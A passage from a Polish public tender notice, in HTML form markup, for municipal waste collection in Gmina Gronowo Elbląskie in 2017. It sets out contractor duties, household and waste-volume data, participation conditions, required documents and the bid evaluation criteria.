ze wskazaniem ilości i pojemności pojemników z jakich odpady odebrano.
27)Wykonawca ma obowiązek sporządzania i przedstawiania Wójtowi Gminy Gronowo Elbląskie miesięcznych raportów zawierających informacje o ilości odebranych odpadów z podziałem na frakcje, miejsca ich zagospodarowania. Raporty muszą być przekazywane w formie papierowej i załączane do faktur. 
28)Wykonawca zobowiązany jest w uzasadnionych wypadkach, na żądanie Zamawiającego przedstawić kopie dowodów dostarczania odpadów do instalacji odzysku lub unieszkodliwiania, tj. karty ewidencji odpadów lub karty przekazania odpadów.
29)Wykonawca zobowiązany jest okazać na żądanie Zamawiającego wszystkich dokumentów potwierdzających wykonanie zamówienia zgodnie z określonymi przez Zamawiającego wymaganiami i przepisami prawa. 
30)Wykonawca wyznaczy koordynatora umowy, który będzie dostępny pod nr telefonu w dni robocze w godzinach od 7:00 do 15:00.
31)Wykonawca zobowiązany jest do niezwłocznego informowania Zamawiającego o wszystkich nieprawidłowościach związanych z postępowaniem z odpadami na terenie nieruchomości, z których odbierane są odpady komunalne.
32)W przypadku stwierdzenia przez Wykonawcę nie przestrzegania zasad segregacji przez mieszkańców/zarządców nieruchomości, którzy zadeklarowali selektywną zbiórkę Wykonawca odbiera odpady i pozostawia ostrzeżenie właścicielowi nieruchomości w formie żółtej naklejki, naklejonej w widocznym miejscu na pojemniku z informacja o niedopełnieniu obowiązku segregacji. Następnie Wykonawca wykonuje zdjęcie w formie cyfrowej, na którym zostanie wskazana data i godzina jego wykonania, które niezwłocznie przekaże Zamawiającemu. 
33)Wykonawca zobowiązany jest do posiadania ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia przez okres realizowania umowy.
34)Wykonawca zachowa uzyskane w trakcie realizacji zamówienia dane, a w szczególności dane osobowe, w poufności oraz będzie przestrzegać zasad wynikających z ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2016 r., poz. 992).  
35)Wykonawca zobowiązany jest do wykazania w terminie 14 dni od dnia 01.01.2017 r. gotowość funkcjonowania punku selektywnej zbiórki odpadów komunalnych, jak również rozmieszczenia wszystkich zestawów do selektywnej zbiorki odpadów składających się z trzech  pojemników (makulatura, tworzywo, szkło) oraz zadeklarowanych pojemników na odpady BIO zgodnie     z załącznikiem nr 1 do SIWZ. 
36)Zamawiający ma prawo w każdym czasie skontrolować Wykonawcę, w szczególności pojazdy Wykonawcy świadczące usługi na terenie gminy, czy przed rozpoczęciem usługi na terenie gminy są one puste, lub po zakończeniu usługi na terenie gminy czy odpady są dostarczone do miejsca przetwarzania odpadów.
37)Wykonawca zobowiązany jest do opracowania trasówki tak, by wszystkie odpady były zbierane tylko na terenie Gminy Gronowo Elbląskie. Zabrania się dopełniania pojazdu odpadami z terenu innej gminy. Pojazdy po zapełnieniu, bez dodatkowego postoju będą dostarczały odpady do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych(RIPOK), tj. Zakładu Utylizacji Odpadów Sp. z o.o. w Elblągu, ul. Mazurska 42.
38)Przeprowadzenie prelekcji dla uczniów dwóch Zespołów Szkół w Gronowie Elbląskim i w Jegłowniku znajdujących się na terenie Gminy Gronowo Elbląskie w ilości łącznie 10 godzin lekcyjnych w okresie realizacji zamówienia, po 5 godzin lekcyjnych przypadających na każdy zespół szkół w okresie realizacji zamówienia. Czas każdej prelekcji  45 minut. Temat prelekcji: System segregowania odpadów komunalnych na terenie Gminy Gronowo Elbląskie. Wykonawca przedstawi Zamawiającemu harmonogram prelekcji, obejmujący wszystkie szkoły i godziny prelekcji w terminie 60 dni od dnia podpisania umowy. Harmonogram winien być uzgodniony z dyrektorem zespołu szkół. (Nie dotyczy Wykonawców, którzy w formularzu oferty nie zadeklarują tego zadania).
39)Wykonawca ma obowiązek prowadzenia dokumentacji potwierdzającej:
a)Koszt odbioru jednego pojemnika o poj. 120 l do gromadzenia odpadów zmieszanych.
b)Koszt zagospodarowania tony odpadów zmieszanych.
c)Koszt odbioru jednego pojemnika selektywnie zebranych odpadów komunalnych(w poszczególnych rodzajach odpadów).
d)Koszt zagospodarowania tony selektywnie zebranych odpadów komunalnych  (w poszczególnych rodzajach odpadów).
e)Koszt organizacji i przeprowadzenia oraz odbierania i zagospodarowania  odpadów wielkogabarytowych w ramach jednej wystawki.
f)Koszt jednostkowy dostarczenia i rozmieszczenia, a także czyszczenia pojemników do gromadzenia odpadów selektywnych.  
5.Oferent na potrzeby prawidłowego skalkulowania ceny ofertowej może posłużyć się ogólną charakterystyką Gminy Gronowo Elbląskie w kontekście odbioru i zagospodarowania odpadów komunalnych.
1)Powierzchnia geodezyjna Gminy Gronowo Elbląskie wynosi  8.915 ha. 
2)Na terenie gminy jest około 1214 gospodarstw domowych (nieruchomości zamieszkałych stan na 31.10.2016r.), w podziale na miejscowości przedstawia się następująco:
Błotnica - 11
Dworki - 21
Fiszewo- 66
Jasionno - 40
Gajewiec - 9
Mojkowo - 10
Kopanka Pierwsza - 13
Kopanka Druga - 11
Karczowiska Górne - 53
Nowy Dwór Elbląskie - 33
Oleśno - 65
Nogat - 29
Różany - 20
Szopy - 15
Rozgart - 34
Wiktorowo - 30
Wikrowo - 32
Gronowo Elbląskie - 412
Jegłownik - 310
Ilość gospodarstw domowych może wzrosnąć lub zmaleć w ciągu realizacji zamówienia 
w zależności od deklaracji jakie zostaną złożone przez właścicieli nieruchomości.
3)Ilość gospodarstw domowych zdeklarowanych do:
-segregowania odpadów     1013,
-niesegregowania odpadów -    201.
Ilość gospodarstw domowych segregujących/niesegregujących odpady może ulec zmianie w ciągu realizacji zamówienia.
4)Prognozowane ilości poszczególnych frakcji odpadów do odebrania i zagospodarowania przedstawiono w tabeli poniżej:
Tabela1. Prognozowana liczba mieszkańców, nagromadzenie odpadów oraz ilości odpadów  wytwarzanych  przewidziana do odbierania i zagospodarowania [Mg]
	2015 rok	2016 rok	2017 rok(szacunek)
(od 01.01.2016r. do 31.09.2016r)
(od 01.10.2016r. do 31.12.2016r.)
(szacunek)	
Główne dane- do przedmiotu zamówienia  nieruchomości zamieszkałe
Ilość odpadów komunalnych Mg/rok w tym:	937,56	779,54	247,20	982,20
Ilość odpadów komunalnych zmieszanych Mg/rok	661,38	509,96	167,73	669,60
Ilość odpadów selektywnie zebranych Mg/rok	276,18	269,58	79,44	313,20
                 - papier Mg/rok	15,92	14,38	4,35	17,40
                 - szkło Mg/rok	74,16	50,64	17,72	71,40
                 -tworzywa, metale, opakowania  wielomateriałowe Mg/rok	60,50	57,74	17,13	      67,68
ilość odpadów wielkogabarytowych Mg/rok	8,44	15,40	3,60	
13,80
ilość odpadów ulegających biodegradacji	97,32	105,86	29,82	116,40
ilość odpadów (poremontowych) budowlanych i rozbiórkowych	19.84	25,56	6,82	26,52
 
5)Wykonawca wszystkich nieruchomościach, na których zamieszkują mieszkańcy, położonych na terenie Gminy Gronowo Elbląskie, dlatego też w celu skalkulowania właściwej ceny ofertowej wykorzystując swoje doświadczenie i profesjonalizm powinien uwzględnić wszelkie okoliczności mające wpływ na rzeczywistą wytwarzaną i przeznaczoną do obioru ilość odpadów komunalnych m.in.: 
-  zmianę ilości mieszkańców, 
-  zmianę ilości nieruchomości, na których zamieszkują mieszkańcy,
- zmianę dotyczącą deklarowanego przez właściciela nieruchomości sposobu zbierania   odpadów.zobowiązany jest do odbioru każdej ilości odpadów komunalnych powstałych na  
6.Nazwy i kody dotyczące przedmiotu zamówienia określone we Wspólnym Słowniku Zamówień Publicznych (CPV):
90.50.00.00-2 Usługi związane z odpadami,
90.51.31.00-7 Usługi wywozu odpadów pochodzących z gospodarstw domowych,
90.51.20.00-9 Usługi transportu odpadów.
7.Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia. 
8.Zamawiający żąda wskazania przez Wykonawcę część zamówienia, której wykonanie zamierza powierzyć podwykonawcy oraz podania firm podwykonawców.
9.Zamawiający informuje, że jeżeli powierzenie wykonania części umowy na usługi podwykonawcy nastąpi w trakcie jego realizacji, Wykonawca na żądanie Zamawiającego przedstawi oświadczenie, o którym mowa w art. 25a ust. 1, lub oświadczeń lub dokumentów potwierdzające brak podstaw wykluczenia wobec tych podwykonawców. Jeżeli Zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, Wykonawca obowiązany będzie zastąpić tego podwykonawcę lub zrezygnować z powierzenia wykonania części zamówienia podwykonawcy. Zamawiający informuje, że powyższe zasady nie będą miały zastosowania wobec dalszych podwykonawców.
10.Zamawiający na podstawie art. 29 ust. 3a ustawy Pzp wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wykonujących czynności kierowcy pojazdów, którzy będą uczestniczyć w realizacji zamówienia, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.  Kodeks pracy(Dz. U. z 2014 r., poz. 1502, z późn. zm.) Zatrudnienie osób, o których mowa powyżej udokumentowane zostanie oświadczeniem Wykonawcy bądź Podwykonawcy. Wykonawca lub Podwykonawca na żądanie Zamawiającego w ciągu 2 dni musi przedłożyć Zamawiającemu  oświadczenie potwierdzające zatrudnienie przez Wykonawcę lub Podwykonawcę na podstawi umowy o pracę osób wykonujących czynności wskazane przez Zamawiającego przy realizacji przedmiotowego zamówienia.  Za niespełnienie przez Wykonawcę lub podwykonawcę przedmiotowych wymagań  Zamawiający naliczy niżej wymienione kary umowne:
a)500,00 zł za każdą osobę, która wykonuje czynności (kierowcy pojazdów) przy realizacji przedmiotowego zamówienia, a nie jest zatrudniona na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę,
b)500,00 zł za każdy dzień opóźnienia w przedstawieniu Zamawiającemu na żądanie oświadczenia potwierdzającego zatrudnienie przez Wykonawcę lub podwykonawcę na podstawie umowy o pracę osób wskazanych przez Zamawiającego.
11.Zamawiający informuje, że nie przewiduje udzielenia zaliczek na poczet wykonania zamówienia.


<br /><br /><b>II.5) Główny kod CPV: </b>90500000-2<br /><b> Dodatkowe kody CPV:</b>90513100-7,
                90512000-9<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data rozpoczęcia: 01/01/2017
                    data zakończenia: 31/12/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Wymagane jest posiadanie przez Wykonawcę aktualnego zezwolenia na transport odpadów komunalnych w odniesieniu do rodzajów odpadów, które są przedmiotem zamówienia.                              
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia szczególnych wymagać w zakresie spełnienia tego warunku. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1)Zamawiający uzna, że Wykonawca spełnił niniejszy warunek jeśli wykaże, 
że w okresie 3 trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w  tym okresie wykonał co najmniej jedną usługę odbierania odpadów komunalnych z nieruchomości, na której zamieszkują mieszkańcy o masie łącznej odebranych odpadów komunalnych niemniejszej niż co najmniej 500 Mg wraz z podaniem ich wartości, przedmiotu, dat wykonania, podmiotów na rzecz, których usługa została wykonana oraz załączeniem dowodów, określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy.
2)Warunek będzie spełniony jeżeli wykonawca będzie dysponował co najmniej:
a.dwoma pojazdami przystosowanymi do odbioru odpadów komunalnych zmieszanych,
b.jednym pojazdem przystosowanym do odbioru selektywnie zebranych odpadów komunalnych,
c.jednym pojazdem do odbierania odpadów w kontenerach, 
d.bazą magazynowo-transportową usytuowaną w gminie, z terenu której będą odbierane odpady lub odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawny.      
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1.Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 ust. 1 ustawy Pzp.
UWAGA:
a)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy Wykonawca wspólnie ubiegających się o udzielenie zamówienia,
b)Wykonawca, który polega zdolnościach zawodowych na zasadach określonych w art. 22a ustawy Pzp, przedmiotowy dokument muszą złożyć również te podmioty.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

Jeżeli w kraju zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej zastępuje się go dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem  wystawione z odpowiednią datą wymaganą dla tego dokumentu.


</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.Wykazu usług wykonanych w okresie 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie wykonał co najmniej jedną usługę odbierania odpadów komunalnych z nieruchomości, na której zamieszkują mieszkańcy o masie łącznej odebranych odpadów komunalnych niemniejszej niż co najmniej 500 Mg wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane  należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie Wykonawcy.
UWAGA:
a)wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym załączniku nr 5 do  SIWZ(oryginał),
b)wartości podane w walutach innych, niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień odbioru tych robót, podając datę i kurs,
c)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wskazywać będą spełnianie przedmiotowego warunku,
d)Wykonawca, który polega na zdolnościach zawodowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia,               w szczególności przedstawiając w tym celu pisemne zobowiązanie (w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia  załącznik nr 8 do SIWZ(oryginał).

2.Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Warunek będzie spełniony jeżeli wykonawca będzie dysponował co najmniej:
1.dwoma pojazdami przystosowanymi do odbioru odpadów komunalnych zmieszanych,
2.jednym pojazdem przystosowanym do odbioru selektywnie zebranych odpadów komunalnych,
3.jednym pojazdem do odbierania odpadów w kontenerach, 
4.bazą magazynowo-transportową usytuowaną w gminie, z terenu której będą odbierane odpady lub odległości nie większej niż 60 km od granicy tej gminy i na terenie, do którego posiada tytuł prawny.       załącznik nr 6 do SIWZ (oryginał).    
UWAGA:
a)Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym załącznik nr 6 do SIWZ(oryginał),
b)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument Wykonawcy składają wspólnie,
c)Wykonawca, który polega na zdolnościach technicznych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie(w formie oryginału) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia -  załącznik nr 8 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej: 
UWAGA:
a)Wykonawca, w terminie 3 dni od zamieszczenia na stronie internetowej informacji o której mowa w art. 86 ust. 5 ust. Pzp (informacja dotycząca otwarcia ofert) przekazuje Zamawiającemu przedmiotowe oświadczenie,
b)oświadczenie należy złożyć zgodnie ze wzorem stanowiącym załącznik nr 7 do SIWZ(oryginał)
c)wraz z oświadczeniem, Wykonawca może złożyć dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu,
d)w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy Wykonawca wspólnie ubiegających się o udzielenie zamówienia.
2)pełnomocnictwo (jeżeli dotyczy)</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>dostarczenie i ustawienie w punktach selektywnej zbiórki pojemników na odpady BIO       </td><td>20</td></tr><tr><td>prelekcje dla uczniów dotyczące systemu segregacji odpadów na terenie Gminy Gronowo Elbląskie</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje możliwość dokonania następujących istotnych zmian w zawartej umowie w sprawie niniejszego zmówienia publicznego, określając jednocześnie warunki 
ich wprowadzenia: 
a)zmiana nazwy, adresu i osób reprezentujących Strony umowy, zmiana formy prawnej działalności Wykonawcy, zmiana osób do kontaktu,
